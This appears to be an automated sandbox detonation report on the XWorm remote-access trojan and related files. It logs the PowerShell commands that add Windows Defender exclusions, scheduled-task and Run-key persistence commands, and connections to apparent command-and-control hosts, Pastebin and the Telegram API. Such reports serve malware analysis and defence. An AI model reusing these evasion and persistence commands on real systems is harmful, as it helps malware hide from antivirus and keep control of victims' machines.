Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2 N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Icons\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm V5.2'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XWorm V5" /tr "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
NL 154.61.71.50:7000 tcp
NL 154.61.71.50:7000 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
AE 86.96.100.98:7000 tcp
SA 2.90.87.156:7000 tcp
SA 31.167.24.129:7000 tcp
SA 31.167.24.129:7000 tcp
NL 154.61.71.50:7000 tcp
SA 2.90.87.156:7000 tcp
SA 2.90.87.156:7000 tcp
SA 2.90.87.156:7000 tcp
SA 2.90.87.156:7000 tcp
AE 86.96.100.98:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
NL 154.61.71.50:7000 tcp
SA 31.167.24.129:7000 tcp
SA 31.167.24.129:7000 tcp
AE 86.96.100.98:7000 tcp
AE 86.96.100.98:7000 tcp
SA 31.167.24.129:7000 tcp
SA 31.167.24.129:7000 tcp
SA 31.167.24.129:7000 tcp
SA 2.90.87.156:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
AE 86.96.100.98:7000 tcp

Files

memory/4444-0-0x00007FFD673D3000-0x00007FFD673D5000-memory.dmp

memory/4444-1-0x0000000000D80000-0x0000000000DB4000-memory.dmp

memory/4444-2-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp

memory/3708-3-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp

memory/3708-4-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qisji2os.5ar.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3708-11-0x000002AD71A80000-0x000002AD71AA2000-memory.dmp

memory/3708-16-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15dde0683cd1ca19785d7262f554ba93
SHA1 d039c577e438546d10ac64837b05da480d06bf69
SHA256 d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA512 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4fc1ceefa94c82f73b7ee478e2920ea3
SHA1 17a031c8d10e316478d85d24ba8a8b5ebfda3149
SHA256 018553e7801fd476285775a4df59eb6a6c79774f6253d6dcbe9e4e96de3c96fb
SHA512 cd581f4b96e1eff3e1c8e75e9e67050060f9bdc92c2a4a0ca8282b4b1839fde9f7848cc262b8ef189466bdd51c0940be7392ae7f0278b2113d10ed590d11b311

memory/4444-53-0x00007FFD673D3000-0x00007FFD673D5000-memory.dmp

memory/4444-54-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

MD5 b2234a1b2a6b4b0e9bfbeeb540e86725
SHA1 d1e45aa8f1136a8809837ad72943dc7e580767e1
SHA256 d1ee800872c14d799d38ab0fb08b1d3c6573cef795f8c3eb9e3066e106e3dabb
SHA512 946eebfb60ea5081f59e9f31a56097564cc52e2b688b77d37eecbca3519e1122c872c98a129f27dc86a4032ef18ca4a98f1ddbdd283076e2e880d17bf63149f5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XWorm V5.2.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Analysis: behavioral10

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:31

Platform

win10v2004-20240802-en

Max time kernel

436s

Max time network

442s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:33

Platform

win10v2004-20240802-en

Max time kernel

437s

Max time network

441s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Icons\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Icons\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:33

Platform

win7-20240708-en

Max time kernel

598s

Max time network

363s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk C:\Users\Admin\AppData\Roaming\XClient.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\q11111 = "C:\\Users\\Public\\q11111" C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1716 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 1716 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 1716 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 2236 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 808 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 808 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 808 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\schtasks.exe
PID 2236 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\schtasks.exe
PID 2236 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\schtasks.exe
PID 1308 wrote to memory of 1324 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 1324 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 1324 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2924 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2924 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2924 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2768 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2768 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2768 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2216 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2216 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2216 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 1916 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 1916 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 1916 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2140 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2140 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2140 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 3028 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 3028 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 3028 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2232 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2232 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2232 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2604 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2604 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2604 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 1300 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 1300 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 1300 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe"

C:\Users\Admin\AppData\Roaming\XClient.exe

"C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\q11111'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'q11111'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "q11111" /tr "C:\Users\Public\q11111"

C:\Windows\system32\taskeng.exe

taskeng.exe {D062D8EC-1716-411D-9AFC-EC10BBE39E0C} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp

Files

memory/1716-0-0x000007FEF55F3000-0x000007FEF55F4000-memory.dmp

memory/1716-1-0x00000000000B0000-0x0000000001632000-memory.dmp

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 767d4d113ea2e9d9886b2aa1710db7f3
SHA1 f7f779a94fb6fe0e3ee8996dff7951b3b5c7b1b0
SHA256 b06506ca596951ae4c75e43d5aba7c255c557cf5607915a214c2a3f53e97934f
SHA512 ea1f6b926b2e19d0521dc3939c247094640ba6fb10b8c0a4dbb48306c5b7e8b9a3659d4f83ead234ba3c035ae09d891d8c2c302945f48b94a4a0916d3ca7ee41

memory/2236-8-0x0000000001240000-0x0000000001290000-memory.dmp

memory/2236-16-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

memory/2236-47-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

memory/2608-52-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2608-53-0x0000000002240000-0x0000000002248000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 37835441f2ee036da3d495d723d1b9fa
SHA1 9b819bfae003e47693865ff63e0026a33d44db71
SHA256 ae52a0e97d8add2a61d621f152c1d08a0870513096c5f0e4bc2af6ca7d842a56
SHA512 b4326f7e2103eb69207a8ab046b8012d0f70b1143c2b916c611dce7fa6974df37f1259d9ed5e700b206e5d25a279b2913e45e833ebaec41d83d917d8a455e30e

memory/808-59-0x000000001B660000-0x000000001B942000-memory.dmp

memory/808-60-0x0000000002260000-0x0000000002268000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2236-75-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

memory/1324-79-0x0000000001320000-0x0000000001370000-memory.dmp

memory/2924-82-0x0000000000230000-0x0000000000280000-memory.dmp

memory/2768-84-0x0000000000CB0000-0x0000000000D00000-memory.dmp

memory/2216-86-0x0000000001150000-0x00000000011A0000-memory.dmp

memory/1916-88-0x0000000001340000-0x0000000001390000-memory.dmp

memory/2232-92-0x0000000000190000-0x00000000001E0000-memory.dmp

memory/2604-94-0x0000000000390000-0x00000000003E0000-memory.dmp

memory/1300-96-0x0000000000B90000-0x0000000000BE0000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:39

Platform

win10v2004-20240802-en

Max time kernel

436s

Max time network

439s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Rocks.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Rocks.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 136.71.105.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:39

Platform

win7-20240708-en

Max time kernel

361s

Max time network

363s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:28

Platform

win10v2004-20240802-en

Max time kernel

419s

Max time network

422s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
